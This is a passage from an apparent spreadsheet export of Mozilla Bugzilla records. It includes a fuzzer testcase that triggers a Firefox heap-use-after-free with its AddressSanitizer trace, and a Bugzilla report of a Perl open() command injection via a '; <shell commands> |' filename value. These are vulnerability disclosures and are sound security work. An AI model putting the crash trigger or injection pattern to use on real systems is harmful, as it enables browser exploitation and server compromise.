	o2.src="data:text/html,&lt;div&gt;";
	o2.addEventListener('load', fun0,false);
	document.body.appendChild(o2);
}
function fun0() {
	o456=frames[0];
	o457=o456.document;
	o457.designMode='on';
	o544=o457.createElement('audio');
	o545=document.createElement('track');
	o544.appendChild(o545);
	o457.write('&lt;div&gt;');
	o544.controls^=1;
	o457.documentElement.appendChild(o544);
	o457.defaultView.onerror=fun3;
	setTimeout(fun2, 4);
}
function fun2() {
	document.documentElement.hidden^=true;
}
function fun3() {
	document.documentElement.style.display='grid';
	document.documentElement.getBoundingClientRect();
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
ASAN output:
=================================================================
==10317==ERROR: AddressSanitizer: heap-use-after-free on address 0x60600031d7b0 at pc 0x7f30c7d993cb bp 0x7fff70111a40 sp 0x7fff70111a38
READ of size 8 at 0x60600031d7b0 thread T0 (Web Content)
    #0 0x7f30c7d993ca in RootViewManager /home/worker/workspace/build/src/view/nsViewManager.h:373:51
    #1 0x7f30c7d993ca in IsPainting /home/worker/workspace/build/src/view/nsViewManager.h:364
    #2 0x7f30c7d993ca in nsViewManager::IsPainting(bool&amp;) /home/worker/workspace/build/src/view/nsViewManager.cpp:1083
    #3 0x7f30c851eb35 in IsSafeToFlush /home/worker/workspace/build/src/layout/base/PresShell.cpp:4069:20
    #4 0x7f30c851eb35 in mozilla::PresShell::DoFlushPendingNotifications(mozilla::ChangesToFlush) /home/worker/workspace/build/src/layout/base/PresShell.cpp:4139
    #5 0x7f30c8491162 in FlushPendingNotifications /home/worker/workspace/build/src/layout/base/nsIPresShell.h:608:5
    #6 0x7f30c8491162 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1807
    #7 0x7f30c849fa23 in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray&lt;RefPtr&lt;nsRefreshDriver&gt; &gt;&amp;) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:299:7
    #8 0x7f30c849f6f4 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:321:5
    #9 0x7f30c84a1d5b in RunRefreshDrivers /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:711:5
    #10 0x7f30c84a1d5b in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:624
    #11 0x7f30c84a1a59 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:525:9
    #12 0x7f30c8cebc64 in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&amp;) /home/worker/workspace/build/src/layout/ipc/VsyncChild.cpp:64:16
    #13 0x7f30c2f78647 in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&amp;) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PVsyncChild.cpp:155:20
    #14 0x7f30c2c36d46 in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&amp;) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundChild.cpp:1512:28
    #15 0x7f30c2b96880 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1872:25
    #16 0x7f30c2b930c7 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1807:17
    #17 0x7f30c2b954f4 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1680:5
    #18 0x7f30c2b95af6 in mozilla::ipc::MessageChannel::MessageTask::Run() /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1713:15
    #19 0x7f30c1de3b90 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1269:14
    #20 0x7f30c1de05d8 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
    #21 0x7f30c2b9ddf6 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:124:5
    #22 0x7f30c2afffe0 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #23 0x7f30c2afffe0 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #24 0x7f30c2afffe0 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #25 0x7f30c7e125ff in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:27
    #26 0x7f30cb416a17 in XRE_RunAppShell() /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:875:22
    #27 0x7f30c2afffe0 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #28 0x7f30c2afffe0 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #29 0x7f30c2afffe0 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #30 0x7f30cb41640f in XRE_InitChildProcess(int, char**, XREChildData const*) /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:699:34
    #31 0x4eb5c3 in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:64:30
    #32 0x4eb5c3 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:286
    #33 0x7f30dd56a82f in __libc_start_main /build/glibc-9tT8Do/glibc-2.23/csu/../csu/libc-start.c:291
    #34 0x41cf18 in _start (/home/nils/fuzzer3/firefox/firefox+0x41cf18)
0x60600031d7b0 is located 48 bytes inside of 64-byte region [0x60600031d780,0x60600031d7c0)
freed by thread T0 (Web Content) here:
    #0 0x4bb44b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:47:3
    #1 0x7f30c85f28a3 in operator delete /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:218:12
    #2 0x7f30c85f28a3 in Release /home/worker/workspace/build/src/view/nsViewManager.h:33
    #3 0x7f30c85f28a3 in Release /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:40
    #4 0x7f30c85f28a3 in Release /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:395
    #5 0x7f30c85f28a3 in assign_assuming_AddRef /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:65
    #6 0x7f30c85f28a3 in operator= /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:166
    #7 0x7f30c85f28a3 in nsDocumentViewer::Hide() /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:2188
    #8 0x7f30ca941be9 in SetVisibility /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6513:9
    #9 0x7f30ca941be9 in non-virtual thunk to nsDocShell::SetVisibility(bool) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6503
    #10 0x7f30c47729fa in nsFrameLoader::Hide() /home/worker/workspace/build/src/dom/base/nsFrameLoader.cpp:1312:12
    #11 0x7f30c89c8b61 in nsHideViewer::Run() /home/worker/workspace/build/src/layout/generic/nsSubDocumentFrame.cpp:922:21
    #12 0x7f30c431d81f in nsContentUtils::RemoveScriptBlocker() /home/worker/workspace/build/src/dom/base/nsContentUtils.cpp:5362:15
    #13 0x7f30c851f023 in ~nsAutoScriptBlocker /home/worker/workspace/build/src/obj-firefox/dist/include/nsContentUtils.h:2986:5
    #14 0x7f30c851f023 in mozilla::PresShell::DoFlushPendingNotifications(mozilla::ChangesToFlush) /home/worker/workspace/build/src/layout/base/PresShell.cpp:4210
    #15 0x7f30c8491954 in FlushPendingNotifications /home/worker/workspace/build/src/layout/base/nsIPresShell.h:608:5
    #16 0x7f30c8491954 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1772
    #17 0x7f30c849fa23 in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray&lt;RefPtr&lt;nsRefreshDriver&gt; &gt;&amp;) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:299:7
    #18 0x7f30c849f6f4 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:321:5
    #19 0x7f30c84a1d5b in RunRefreshDrivers /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:711:5
    #20 0x7f30c84a1d5b in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:624
    #21 0x7f30c84a1a59 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:525:9
    #22 0x7f30c8cebc64 in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&amp;) /home/worker/workspace/build/src/layout/ipc/VsyncChild.cpp:64:16
    #23 0x7f30c2f78647 in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&amp;) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PVsyncChild.cpp:155:20
    #24 0x7f30c2c36d46 in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&amp;) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundChild.cpp:1512:28
    #25 0x7f30c2b96880 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1872:25
    #26 0x7f30c2b930c7 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1807:17
    #27 0x7f30c2b954f4 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1680:5
    #28 0x7f30c2b95af6 in mozilla::ipc::MessageChannel::MessageTask::Run() /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1713:15
    #29 0x7f30c1de3b90 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1269:14
    #30 0x7f30c1de05d8 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
    #31 0x7f30c2b9ddf6 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:124:5
    #32 0x7f30c2afffe0 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #33 0x7f30c2afffe0 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #34 0x7f30c2afffe0 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #35 0x7f30c7e125ff in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:27
    #36 0x7f30cb416a17 in XRE_RunAppShell() /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:875:22
    #37 0x7f30c2afffe0 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #38 0x7f30c2afffe0 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #39 0x7f30c2afffe0 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #40 0x7f30cb41640f in XRE_InitChildProcess(int, char**, XREChildData const*) /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:699:34
    #41 0x4eb5c3 in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:64:30
    #42 0x4eb5c3 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:286
    #43 0x7f30dd56a82f in __libc_start_main /build/glibc-9tT8Do/glibc-2.23/csu/../csu/libc-start.c:291
previously allocated by thread T0 (Web Content) here:
    #0 0x4bb79c in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
    #1 0x4ec75d in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7f30c85f1e3b in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
    #3 0x7f30c85f1e3b in nsDocumentViewer::MakeWindow(nsSize const&amp;, nsView*) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:2446
    #4 0x7f30c85fe6f0 in nsDocumentViewer::Show() /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:2104:10
    #5 0x7f30ca941be9 in SetVisibility /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6513:9
    #6 0x7f30ca941be9 in non-virtual thunk to nsDocShell::SetVisibility(bool) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6503
    #7 0x7f30c4771941 in nsFrameLoader::Show(int, int, int, int, nsSubDocumentFrame*) /home/worker/workspace/build/src/dom/base/nsFrameLoader.cpp:1140:15
    #8 0x7f30c894f641 in nsSubDocumentFrame::ShowViewer() /home/worker/workspace/build/src/layout/generic/nsSubDocumentFrame.cpp:185:22
    #9 0x7f30c89c85e4 in AsyncFrameInit::Run() /home/worker/workspace/build/src/layout/generic/nsSubDocumentFrame.cpp:92:60
    #10 0x7f30c431d81f in nsContentUtils::RemoveScriptBlocker() /home/worker/workspace/build/src/dom/base/nsContentUtils.cpp:5362:15
    #11 0x7f30c851f023 in ~nsAutoScriptBlocker /home/worker/workspace/build/src/obj-firefox/dist/include/nsContentUtils.h:2986:5
    #12 0x7f30c851f023 in mozilla::PresShell::DoFlushPendingNotifications(mozilla::ChangesToFlush) /home/worker/workspace/build/src/layout/base/PresShell.cpp:4210
    #13 0x7f30c46fd041 in FlushPendingNotifications /home/worker/workspace/build/src/obj-firefox/dist/include/nsIPresShell.h:599:5
    #14 0x7f30c46fd041 in nsDocument::FlushPendingNotifications(mozilla::FlushType) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8056
    #15 0x7f30c44e7118 in GetPrimaryFrame /home/worker/workspace/build/src/dom/base/Element.cpp:2176:10
    #16 0x7f30c44e7118 in mozilla::dom::Element::GetBoundingClientRect() /home/worker/workspace/build/src/dom/base/Element.cpp:967
    #17 0x7f30c5bbe7bc in mozilla::dom::ElementBinding::getBoundingClientRect(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::Element*, JSJitMethodCallArgs const&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/ElementBinding.cpp:2086:59
    #18 0x7f30c609344e in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2953:13
    #19 0x7f30cb8ccc63 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #20 0x7f30cb8ccc63 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:455
    #21 0x7f30cb8b568f in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:506:12
    #22 0x7f30cb8b568f in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2997
    #23 0x7f30cb89bb28 in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:395:12
    #24 0x7f30cb8ccde8 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:473:15
    #25 0x7f30cb8cd612 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:519:10
    #26 0x7f30cc4e08ee in js::Wrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
    #27 0x7f30cc497f94 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:353:23
    #28 0x7f30cc4c1153 in js::Proxy::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:464:21
    #29 0x7f30cc4c3ab7 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:716:12
    #30 0x7f30cb8ccfb3 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #31 0x7f30cb8ccfb3 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:437
    #32 0x7f30cb8cd612 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:519:10
    #33 0x7f30cc24c17b in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2885:12
    #34 0x7f30c5b071c4 in mozilla::dom::OnErrorEventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::EventOrString const&amp;, mozilla::dom::Optional&lt;nsAString&gt; const&amp;, mozilla::dom::Optional&lt;unsigned int&gt; const&amp;, mozilla::dom::Optional&lt;unsigned int&gt; const&amp;, mozilla::dom::Optional&lt;JS::Handle&lt;JS::Value&gt; &gt; const&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:398:37
    #35 0x7f30c649ae83 in Call&lt;nsISupports *&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:532:12
    #36 0x7f30c649ae83 in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:166
    #37 0x7f30c64670e2 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1123:51
    #38 0x7f30c6468ecc in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1297:20
SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/view/nsViewManager.h:373:51 in RootViewManager
Shadow bytes around the buggy address:
  0x0c0c8005baa0: fd fd fd fd fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c0c8005bab0: fa fa fa fa fd fd fd fd fd fd fd fd fa fa fa fa
  0x0c0c8005bac0: fd fd fd fd fd fd fd fd fa fa fa fa fd fd fd fd
  0x0c0c8005bad0: fd fd fd fd fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c0c8005bae0: fa fa fa fa fd fd fd fd fd fd fd fd fa fa fa fa
=&gt;0x0c0c8005baf0: fd fd fd fd fd fd[fd]fd fa fa fa fa fd fd fd fd
  0x0c0c8005bb00: fd fd fd fd fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c0c8005bb10: fa fa fa fa fd fd fd fd fd fd fd fd fa fa fa fa
  0x0c0c8005bb20: fd fd fd fd fd fd fd fd fa fa fa fa fd fd fd fd
  0x0c0c8005bb30: fd fd fd fd fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c0c8005bb40: fa fa fa fa fd fd fd fd fd fd fd fd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0317==ABORTING</t>
        </is>
      </c>
      <c r="X4720" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4721">
      <c r="A4721" t="n">
        <v>437169</v>
      </c>
      <c r="B4721" t="inlineStr">
        <is>
          <t>2008-06-03 20:02:22 -0700</t>
        </is>
      </c>
      <c r="C4721" t="inlineStr">
        <is>
          <t>[SECURITY] Local files on the server can be attached to a bug (making them publicly visible) when importing bugs with -attach_path</t>
        </is>
      </c>
      <c r="D4721" t="inlineStr">
        <is>
          <t>2008-09-30 23:18:12 -0700</t>
        </is>
      </c>
      <c r="E4721" t="n">
        <v>1</v>
      </c>
      <c r="F4721" t="n">
        <v>1</v>
      </c>
      <c r="G4721" t="n">
        <v>4</v>
      </c>
      <c r="H4721" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4721" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4721" t="inlineStr">
        <is>
          <t>Bug Import/Export &amp; Moving</t>
        </is>
      </c>
      <c r="K4721" t="inlineStr">
        <is>
          <t>2.22.1</t>
        </is>
      </c>
      <c r="L4721" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4721" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4721" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4721" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4721" t="inlineStr"/>
      <c r="Q4721" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4721" t="inlineStr">
        <is>
          <t>minor</t>
        </is>
      </c>
      <c r="S4721" t="inlineStr">
        <is>
          <t>Bugzilla 2.22</t>
        </is>
      </c>
      <c r="T4721" t="n">
        <v>1</v>
      </c>
      <c r="U4721" t="n">
        <v>0</v>
      </c>
      <c r="V4721" t="n">
        <v>21</v>
      </c>
      <c r="W4721" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14
Build Identifier: 3.0.4
when importing a bug in xml, there is an insecure call done to open() which could potentially allow command execution. the bug in the code is as follows: 
sub process_attachment() {
    my ( $twig, $attach ) = @_;
...
        my $encoding = $attach-&gt;first_child('data')-&gt;{'att'}-&gt;{'encoding'};
...
        elsif ($encoding =~ /filename/) {
...
            my $attach_filename = $attach_path . "/" . $attach-&gt;field('data'); &lt;-- field('data') comes from the xml file
            open(ATTACH_FH, $attach_filename) or &lt;-- here's the insecure open
                Error("cannot open $attach_filename", undef);
...
}
basicly, you could have something like "; &lt;shell commands&gt; |".
a nice solutions would be to use the 3-arg open. 
another issue is that there is no check done for directory traversal. 
Reproducible: Didn't try
Steps to Reproduce:
1.
2.
3.</t>
        </is>
      </c>
      <c r="X4721" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4722">
      <c r="A4722" t="n">
        <v>854157</v>
      </c>
      <c r="B4722" t="inlineStr">
        <is>
          <t>2013-03-23 19:32:00 -0700</t>
        </is>
      </c>
      <c r="C4722" t="inlineStr">
        <is>
          <t>Assertion failure: regs-&gt;fp() == regs_-&gt;fp()-&gt;prev(), at vm/Stack.cpp or Assertion failure: !inline_, at vm/Stack.cpp with gcPreserveCode</t>
        </is>
      </c>
      <c r="D4722" t="inlineStr">
        <is>
          <t>2014-11-19 20:03:05 -0800</t>
        </is>
      </c>
      <c r="E4722" t="n">
        <v>1</v>
      </c>
      <c r="F4722" t="n">
        <v>1</v>
      </c>
      <c r="G4722" t="n">
        <v>3</v>
      </c>
      <c r="H4722" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4722" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4722" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4722" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4722" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4722" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4722" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4722" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4722" t="inlineStr">
        <is>
          <t>[jsbugmon:][adv-main23+]</t>
        </is>
      </c>
      <c r="Q4722" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4722" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4722" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4722" t="n">
        <v>1</v>
      </c>
      <c r="U4722" t="n">
        <v>0</v>
      </c>
      <c r="V4722" t="n">
        <v>13</v>
      </c>
      <c r="W4722" t="inlineStr">
        <is>
          <t>Created attachment 728685
testcase
The attached testcase asserts js debug shell on m-c changeset bcf09432affd with --no-ion and -a at Assertion failure: regs-&gt;fp() == regs_-&gt;fp()-&gt;prev(), at vm/Stack.cpp
(This was a very tough testcase to reduce)
autoBisect shows this is probably related to the following changeset:
The first bad revision is:
changeset:   120310:d7dd65663469
user:        Brian Hackett
date:        Tue Jan 29 16:20:03 2013 -0700
summary:     Bug 833898 - Allow converting mixed arrays of ints and doubles to uniform doubles, r=jandem.</t>
        </is>
      </c>
      <c r="X4722" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4723">
      <c r="A4723" t="n">
        <v>819857</v>
      </c>
      <c r="B4723" t="inlineStr">
        <is>
          <t>2012-12-09 21:38:26 -0800</t>
        </is>
      </c>
      <c r="C4723" t="inlineStr">
        <is>
          <t>Move birch nightly users to mozilla-central nightlies</t>
        </is>
      </c>
      <c r="D4723" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E4723" t="n">
        <v>1</v>
      </c>
      <c r="F4723" t="n">
        <v>1</v>
      </c>
      <c r="G4723" t="n">
        <v>5</v>
      </c>
      <c r="H4723" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4723" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J4723" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4723" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4723" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4723" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4723" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4723" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4723" t="inlineStr"/>
      <c r="Q4723" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4723" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4723" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4723" t="n">
        <v>1</v>
      </c>
      <c r="U4723" t="n">
        <v>0</v>
      </c>
      <c r="V4723" t="n">
        <v>18</v>
      </c>
      <c r="W4723" t="inlineStr">
        <is>
          <t>Over in bug 818732, we're planning to turn on per-window private browsing on Nightly by default.  So far we've had a bunch of early testers on the Birch branch, and we would like to move them to Nightly so that they can receive updates after we switch over in bug 818732.  Once that happens, I'm planning to repurpose Birch to build global PB builds.  In order for the transition to happen smoothly for those people, we need to move those nightly users to the default nightly update channel.
Currently we're planning to finish the switchover tomorrow, so that the first Nightly with per-window private browsing would be built on Monday night.</t>
        </is>
      </c>
      <c r="X4723" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4724">
      <c r="A4724" t="n">
        <v>83618</v>
      </c>
      <c r="B4724" t="inlineStr">
        <is>
          <t>2001-05-31 22:28:57 -0700</t>
        </is>
      </c>
      <c r="C4724" t="inlineStr">
        <is>
          <t>checksetup.pl won't compile if DBI is not installed</t>
        </is>
      </c>
      <c r="D4724" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:24 -0800</t>
        </is>
      </c>
      <c r="E4724" t="n">
        <v>1</v>
      </c>
      <c r="F4724" t="n">
        <v>1</v>
      </c>
      <c r="G4724" t="n">
        <v>4</v>
      </c>
      <c r="H4724" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4724" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4724" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
